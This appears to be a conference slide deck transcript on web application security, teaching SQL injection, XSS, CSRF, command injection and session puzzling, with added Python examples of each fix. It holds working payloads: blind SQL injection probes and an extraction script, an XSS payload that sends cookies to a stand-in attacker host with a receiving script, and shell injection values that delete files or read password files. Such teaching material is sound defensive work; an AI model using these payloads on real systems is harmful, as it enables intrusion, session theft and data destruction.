hacking sites for fun and profit
DESCRIPTION
How common exploits are used to take over a website, how to identify those vulnerabilities in your own code, and how to prevent your site from being compromised. The bad guys already know all the techniques, but that doesn't mean we should make it any easier to take over sites. Many of these vulnerabilities are prevented simply by keeping the issues in mind as you write your code.
TRANSCRIPT
![Page 1: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/1.jpg)
Hacking Sites for Fun and Profit
SkiPHP 2014
David Stockton
![Page 2: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/2.jpg)
or How to Hack Websites and Prevent Your Site from Being
Hacked
![Page 3: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/3.jpg)
or How I Learned to Stop Worrying and Love the SQL Injection
Web
![Page 4: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/4.jpg)
What this is for
• Learn how common exploits are done and how to identify code that is vulnerable
• Learn how to fix code that is susceptible to these attacks
• Learn how to attack your own code and your own sites so you can fix them
![Page 5: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/5.jpg)
What this is not for
• Hacking or attacking sites that you do not have permission to attack!
• Don't do it.
![Page 6: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/6.jpg)
The Code
• The code I am showing you is similar to real code I’ve seen in real projects, but it was written specifically for this presentation.
![Page 7: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/7.jpg)
Exploit 1: SQL injection
• select * from users where username = '$_POST['username']';
![Page 8: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/8.jpg)
SQL Injection
• $_POST['username'] = "' OR 1=1 -- " (note the trailing space: MySQL only treats -- as a comment when whitespace follows it)
• select * from users where username = '' OR 1=1 -- '
• The WHERE clause is now always true, so the query returns every user; code that takes the first row logs the attacker in as that user without a password.
![Page 9: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/9.jpg)
SQL Injection: where the tainted input comes from
• $_GET
• $_POST
• $_REQUEST
• what else...
![Page 10: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/10.jpg)
SQL Injection: where the tainted input comes from (continued)
• $_COOKIE
• values from the database (second-order injection: data that was stored safely is still untrusted when it is read back and used in another query)
• Some parts of $_SERVER (request headers such as User-Agent, Referer and Host are chosen by the client)
![Page 11: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/11.jpg)
Errors can help attackers
• Showing SQL errors can help attackers refine SQL injection attempts (the error text reveals the shape of the query and which part of the injected syntax was rejected)
• Other errors can help in other ways (some stack traces and connection errors show passwords)
• Turn off display_errors in production, but log errors always (log_errors on, with the log file outside the web root)
![Page 12: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/12.jpg)
Blind SQL injection
• The page shows neither query results nor errors, so ask yes/no questions instead: inject a condition and watch whether the page changes, or make calls that take varying amounts of time to run and use the time to determine the answers to questions about the system you are attacking.
![Page 13: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/13.jpg)
Blind SQL injection
• http://news.org/news.php?id=5
• http://news.org/news.php?id=5 and 1=1 (same page as id=5)
• http://news.org/news.php?id=5 and 1=2 (a different page, or no article: the condition reached the database, so id is injectable; note there are no quotes to escape here, the parameter is numeric)
![Page 14: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/14.jpg)
Determine DB version
• news.php?id=5 and substring(@@version, 1,1)=5 (true, and the article shows, only on MySQL 5.x)
![Page 15: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/15.jpg)
Subselects?
• news.php?id=5 and (select 1) = 1
![Page 16: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/16.jpg)
Access to other databases/tables
• news.php?id=12 and (select 1 from mysql.user limit 0,1) = 1
• A true result means the application's database account can read the mysql system database, far more privilege than a news site needs.
![Page 17: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/17.jpg)
Guessing tables
• news.php?id=6 and (select 1 from users limit 0,1) =1
![Page 18: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/18.jpg)
Guessing column names
• news.php?id=11 and (select substring(concat(1, password),1,1) from users limit 0,1)=1
• concat(1, password) always starts with '1', so the condition is true if and only if the password column exists; if it doesn't, the query errors and the page changes.
![Page 19: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/19.jpg)
Guessing data
• news.php?id=4 and ascii(substring((SELECT concat(username, 0x3a, password) from users limit 0,1),1,1))>80
• 0x3a is ':', so the string being read is username:password. Increment the threshold (or binary search it) to guess each value letter by letter, then move the substring offset to the next character.
![Page 20: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/20.jpg)
Preventing SQL Injection
● mysql_real_escape_string (only protects quoted string contexts; it does nothing for numeric injection like id=5 and 1=1, and the mysql_ extension is deprecated and removed in PHP 7, so use mysqli or PDO)
● Prepared statements (the preferred fix: values are bound as data and are never parsed as SQL)
● Input validation and whitelists (cast ids to int; for table and column names, which cannot be bound as parameters, accept only values from a fixed list)
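The boolean-based extraction from the "Guessing data" slides and the prepared-statement fix, together in one added example (this is not code from the talk; it is written for this page). It assumes an in-memory SQLite database standing in for news.org, with a constructed news table and a users table holding one row; SQLite's unicode(substr(...)) plays the role of MySQL's ascii(substring(...)), and the threshold is binary searched rather than incremented by one, which generalises the slide's ">80" probe to seven requests per character.

```python
import sqlite3

# Constructed stand-in for the deck's news.org backend (schema and rows are
# assumptions for this example; SQLite in memory instead of MySQL).
DB = sqlite3.connect(":memory:", check_same_thread=False)
DB.executescript("""
    CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
    CREATE TABLE users (username TEXT, password TEXT);
    INSERT INTO news VALUES (5, 'SkiPHP 2014 schedule');
    INSERT INTO users VALUES ('admin', 's3cret');
""")


def news_page_vulnerable(id_param: str) -> bool:
    """news.php?id=... built by string concatenation, like the deck's code.
    Returns True when an article would be rendered (the query found a row)."""
    try:
        row = DB.execute("SELECT title FROM news WHERE id = " + id_param).fetchone()
    except sqlite3.Error:
        return False          # a syntax error shows no article either
    return row is not None


def news_page_fixed(id_param: str) -> bool:
    """Same page with a bound parameter: the input is only ever data."""
    row = DB.execute("SELECT title FROM news WHERE id = ?", (id_param,)).fetchone()
    return row is not None


def oracle(condition: str, page=news_page_vulnerable) -> bool:
    """One yes/no question: does 'id=5 and (<condition>)' still show article 5?"""
    return page("5 and (" + condition + ")")


def extract(subquery: str, page=news_page_vulnerable, max_len: int = 64) -> str:
    """Read the first row of `subquery` one character at a time through the
    oracle. Each character is found by binary search over the ASCII range,
    so 7 requests per character instead of up to 127 with increment-by-one."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # coalesce(..., 0): past the end of the string substr() yields ''
            # and unicode('') is NULL, which must compare as "not greater".
            probe = f"coalesce(unicode(substr(({subquery}), {pos}, 1)), 0) > {mid}"
            if oracle(probe, page):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:           # no character at this position: done
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    secret = "SELECT username || ':' || password FROM users LIMIT 1"
    print("vulnerable page leaks:", extract(secret))
    print("fixed page leaks:", repr(extract(secret, page=news_page_fixed)))
```

Against the concatenated query the loop recovers admin:s3cret without ever seeing a result or an error; against the bound-parameter version every probe fails, because "5 and (...)" is compared to the id column as a single string rather than parsed as SQL.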
![Page 21: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/21.jpg)
Exploit 2: XSS
• Cross-site Scripting
![Page 22: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/22.jpg)
What is it?
• Attacker-supplied script running in the victim's browser, inside the origin of your site
![Page 23: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/23.jpg)
So? It’s their browser
• Yep, but it may not be their code.
![Page 24: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/24.jpg)
So? It’s their browser
• It may not be your code, but it might call your code in a way you don’t want
![Page 25: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/25.jpg)
XSS Code
<img src="<?php echo $_POST['image']; ?>">
<.. javascript to open the print dialog ..>
![Page 26: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/26.jpg)
So what?
• What if we post code into $_POST['image']?
● Steal session cookies
● Call JavaScript APIs that cause actions on the server (CSRF-style requests, sent with the victim's cookies)
● Post forms as the user
![Page 27: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/27.jpg)
The payload: $_POST[‘image’]
/images/add.gif"><script type="text/javascript">alert('xss!');</script><img src="
![Page 28: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/28.jpg)
Ermahgerd er perperp.
![Page 29: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/29.jpg)
Ooh, that's soooo malicious, I'm totally shaking right now
• Fine. How about this.
• image = /images/add.gif"><script type="text/javascript">document.write('<img src="http://attacker.example.com/session.php?' + document.cookie + '">'); </script><img src="
![Page 30: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/30.jpg)
WTH did that do?
• JavaScript ran FROM the site we're attacking (so it runs in that site's origin and can read that site's cookies), and it sent your site cookies to a script the attacker controls.
![Page 31: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/31.jpg)
So you stole my cookie. So what?
• Here's what. The attacker's session.php receives the cookie in its query string (document.cookie was appended after the '?') and mails it out:
<?php
// session.php on attacker.example.com
$session = $_GET['PHPSESSID'];
$body = 'Got session: ' . $session;
mail('[email protected]', 'Session Captured', $body);
![Page 32: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/32.jpg)
Oooh, you emailed my cookie... So...
![Page 33: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/33.jpg)
Now it’s my turn...
![Page 34: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/34.jpg)
Why this matters
• Sites identify and authenticate users with the session cookie.
• By presenting your session ID, I have identified myself as you. I am now logged in as you and can do anything you can do on the site.
![Page 35: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/35.jpg)
Ok, so I can steal my own session
• Here’s how to use it against someone.
![Page 36: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/36.jpg)
The first part of the attack
• Put a page on the attacking site that posts the payload to the site under attack (the image value arrives via $_POST, so a form that submits itself to the vulnerable print page). Email the victim a link to that page.
• They click the link, the payload runs in their logged-in browser, and you steal their session.
![Page 37: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/37.jpg)
What else can I do?
• Cross Site Request Forgery (CSRF)
• Causing actions to happen on the user’s behalf
• Purchasing things, changing passwords, creating accounts, etc.
![Page 38: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/38.jpg)
How to prevent?
• Escape output (htmlspecialchars with ENT_QUOTES for anything echoed into HTML, and escape for the context it lands in: attribute, JavaScript, URL)
• Whitelist URLs, domains, input
• Make the print page look up image paths from a trusted source (the database, keyed by an id) instead of taking the path from the request
• Mark the session cookie HttpOnly (and Secure) so document.cookie cannot read it; this blunts cookie theft, though not the other actions script can take as the user
![Page 39: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/39.jpg)
Prevent CSRF
• Use a CSRF token: a random, unguessable value stored in the server-side session and embedded as a hidden field in every state-changing form.
• Disallow requests that don't contain the correct token, comparing it in constant time.
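An added example covering both prevention slides, the XSS one and the CSRF one (it is not code from the talk). It renders the deck's print-page img tag three ways, raw, escaped for the attribute context, and restricted to an assumed allowlist of image paths, feeding it the deck's own payload, then shows a session-bound CSRF token issued and checked in constant time. The session and form are plain dicts standing in for $_SESSION and $_POST.

```python
import html
import hmac
import secrets

# The deck's payload for $_POST['image'], reproduced as a constant.
PAYLOAD = '/images/add.gif"><script type="text/javascript">alert(\'xss!\');</script><img src="'

# Assumed allowlist of image paths the print page is permitted to show.
ALLOWED_IMAGES = {"/images/add.gif", "/images/print.gif"}


def render_vulnerable(image: str) -> str:
    """<img src="<?php echo $_POST['image']; ?>">: raw input inside an attribute."""
    return '<img src="' + image + '">'


def render_escaped(image: str) -> str:
    """Escape output for the HTML attribute context (PHP: htmlspecialchars with
    ENT_QUOTES). quote=True turns both quote characters into entities, so the
    payload can no longer close the src attribute and start a new tag."""
    return '<img src="' + html.escape(image, quote=True) + '">'


def render_allowlisted(image: str) -> str:
    """Whitelist the input and still escape it: the request may only choose
    among paths the server already trusts."""
    if image not in ALLOWED_IMAGES:
        raise ValueError("image not permitted: " + image)
    return render_escaped(image)


def contains_script(markup: str) -> bool:
    """Crude check for the demo: did a <script> tag survive into the page?"""
    return "<script" in markup.lower()


# --- CSRF token -------------------------------------------------------------

def issue_csrf_token(session: dict) -> str:
    """Generate a random token, remember it in the server-side session and
    return it for embedding as a hidden field in every state-changing form."""
    token = secrets.token_hex(32)
    session["csrf_token"] = token
    return token


def csrf_ok(session: dict, form: dict) -> bool:
    """Reject the request unless the submitted token matches the session's.
    compare_digest keeps the check constant-time, so response timing does not
    leak the token byte by byte."""
    expected = session.get("csrf_token")
    supplied = form.get("csrf_token")
    if not expected or not supplied:
        return False
    return hmac.compare_digest(expected, supplied)


def csrf_demo() -> tuple:
    """Issue a token for one session, then try a legitimate, a forged and a
    token-less submission. Returns (accepted, forged_rejected, missing_rejected)."""
    session = {}
    token = issue_csrf_token(session)
    return (csrf_ok(session, {"csrf_token": token}),
            not csrf_ok(session, {"csrf_token": "0" * 64}),
            not csrf_ok(session, {}))
```

The escaped render turns the payload's quotes into &quot; and &#x27;, so the browser sees one long, harmless src value; the allowlisted render refuses the payload outright. A CSRF page on another origin cannot read the victim's session to learn the token, so its forged POST fails the check even though the browser attached the victim's cookies.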
![Page 40: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/40.jpg)
Exploit prevention in general
• Filter input
• Escape output
• This works for SQL injection, XSS and more... in general
![Page 41: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/41.jpg)
Exploit 3: Command injection
● shell_exec
● exec
● passthru
● system
● `some command`
![Page 42: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/42.jpg)
PHP Web File Browser
• Supposed to allow viewing of files within the web directories
• $files = shell_exec('ls -al ' . $_GET['dir']);
![Page 43: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/43.jpg)
What's the danger?
• $_GET['dir'] = '.; rm -rf / *';
• Or whatever.
• cat /etc/passwd; cat /etc/shadow
![Page 44: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/44.jpg)
How to prevent?
• If you must use user input in a command, use escapeshellarg()
• $dir = escapeshellarg($_GET['dir']);
• $files = shell_exec('ls -al ' . $dir);
• Validate that the input is allowed: escapeshellarg() stops the shell from interpreting metacharacters, but '../../etc' is still one perfectly valid argument, so also check that the resolved path stays inside the web directory, or skip the shell entirely (scandir() lists a directory without running anything)
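The file browser from the slides, as an added example written for this page rather than taken from the talk, in three versions: the deck's shell string concatenation, the escapeshellarg() equivalent (shlex.quote), and a version that validates the resolved path against the web root and passes an argument vector with no shell at all. It assumes a POSIX system with ls and builds a throwaway web root in a temporary directory.

```python
import os
import shlex
import subprocess
import tempfile

# Constructed web root standing in for the deck's "web directories".
WEB_ROOT = os.path.realpath(tempfile.mkdtemp(prefix="webroot-"))
os.mkdir(os.path.join(WEB_ROOT, "images"))
open(os.path.join(WEB_ROOT, "images", "add.gif"), "w").close()


def run(cmd, **kw) -> str:
    """Run cmd from the web root and return its stdout."""
    return subprocess.run(cmd, cwd=WEB_ROOT, capture_output=True, text=True, **kw).stdout


def list_vulnerable(dir_param: str) -> str:
    """shell_exec('ls -al ' . $_GET['dir']): the shell parses the whole string,
    so ';', '|', '`' and friends in dir_param become new commands."""
    return run("ls -al " + dir_param, shell=True)


def list_quoted(dir_param: str) -> str:
    """escapeshellarg() equivalent: shlex.quote() wraps the value in single
    quotes so the shell sees exactly one argument. Metacharacters are harmless
    now, but '../../etc' or '/etc' are still perfectly valid arguments."""
    return run("ls -al " + shlex.quote(dir_param), shell=True)


def resolve_inside_root(dir_param: str) -> str:
    """Validate the input: resolve symlinks and '..', then require the result
    to stay inside WEB_ROOT and to be a directory."""
    target = os.path.realpath(os.path.join(WEB_ROOT, dir_param))
    if target != WEB_ROOT and not target.startswith(WEB_ROOT + os.sep):
        raise ValueError("outside the web root: " + dir_param)
    if not os.path.isdir(target):
        raise ValueError("not a directory: " + dir_param)
    return target


def is_allowed(dir_param: str) -> bool:
    try:
        resolve_inside_root(dir_param)
        return True
    except ValueError:
        return False


def list_hardened(dir_param: str) -> str:
    """Validated path, and no shell at all: the argument vector goes straight
    to execve, so there is nothing left for an attacker to inject into."""
    return run(["ls", "-al", resolve_inside_root(dir_param)])
```

With the deck's style of payload ('.; echo INJECTED' here instead of rm -rf) the first version runs the second command; the quoted version merely fails to list a directory with a strange name; the hardened version refuses anything that resolves outside the web root before any process is started.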
![Page 45: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/45.jpg)
Other types of injection
● Code (eval)
● Regex
● Log
● LDAP
![Page 46: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/46.jpg)
Other exploits
● Authentication / Session management
● Information disclosure
● Sensitive data exposure
● File upload flaws
● Unchecked redirects
● Leftover debug code
● Session fixation
● Internal threats
● Privacy violation (passwords in logs, etc.)
![Page 47: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/47.jpg)
Mitigation
• Validation on the client (for usability only: the client is under the attacker's control, so the server must validate every request again)
• Reject invalid requests entirely, and log the intrusion attempt
• Principle of least privilege (database account, web server user, file permissions)
• Filter input, escape output
![Page 49: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/49.jpg)
Session Puzzling
• Making requests to privileged and unprivileged pages in a particular order, so that session state written by one page satisfies the check in another and escalates the attacker's privileges
![Page 50: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/50.jpg)
How it could work
• Page requiring authentication looks for ‘user’ in session to determine authentication
![Page 51: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/51.jpg)
Session Puzzling
• Login -> the forgot password page passes the account being reset to the next step via 'user' in the session, without ever checking a password
![Page 52: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/52.jpg)
Put it together
• Hit pages quickly in this order:
• Login -> forgot password (sets 'user' for the victim's account) -> privileged page
• Privileged page sees 'user' and allows the attacker in
![Page 53: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/53.jpg)
How was this found?
• By accident, when a web crawler hit the pages in that order and gained access to privileged pages
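The puzzle and its fix as an added, runnable model (not code from the talk). Sessions are plain dicts standing in for $_SESSION, and a one-entry credential store is assumed for the example. The vulnerable pages share the 'user' key exactly as the slides describe; the fixed pages keep workflow state under its own key and make authentication an explicit fact that only a successful login sets.

```python
import hmac

# Assumed account store for the example (plaintext only to keep it short;
# real code stores password hashes).
CREDENTIALS = {"admin": "correct horse battery staple"}


# --- the puzzle: two pages agree on one session key ------------------------

def login_vulnerable(session: dict, username: str, password: str) -> bool:
    if hmac.compare_digest(CREDENTIALS.get(username, ""), password):
        session["user"] = username
        return True
    return False


def forgot_password_vulnerable(session: dict, username: str) -> None:
    """Step one of the reset flow: remember which account is being reset. It
    never checks a password, yet it writes the same key login writes."""
    session["user"] = username


def privileged_page_vulnerable(session: dict) -> bool:
    """Authentication check from the deck: is 'user' in the session?"""
    return "user" in session


# --- the fix: authentication state is its own, explicit fact ---------------

def login_fixed(session: dict, username: str, password: str) -> bool:
    if hmac.compare_digest(CREDENTIALS.get(username, ""), password):
        session.clear()                  # stands in for session_regenerate_id()
        session["user"] = username
        session["authenticated"] = True
        return True
    return False


def forgot_password_fixed(session: dict, username: str) -> None:
    """Workflow state lives under its own key and never implies a login."""
    session["password_reset_user"] = username


def privileged_page_fixed(session: dict) -> bool:
    return session.get("authenticated") is True


def puzzle(forgot, privileged) -> bool:
    """The attacker's request order: forgot-password for the victim's account,
    then the privileged page, with no login in between. True means let in."""
    session = {}                         # fresh, never-authenticated session
    forgot(session, "admin")
    return privileged(session)
```

The check "is 'user' set?" answers the wrong question; it tests whether any page has mentioned a user, not whether this session proved who it belongs to. Giving each workflow its own key and clearing the session at login closes the ordering trick.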
![Page 54: Hacking sites for fun and profit](https://reader034.vdocument.in/reader034/viewer/2022052504/5466f26daf7959483f8b6d25/html5/thumbnails/54.jpg)
Questions?
• Please rate this talk.
• https://joind.in/10446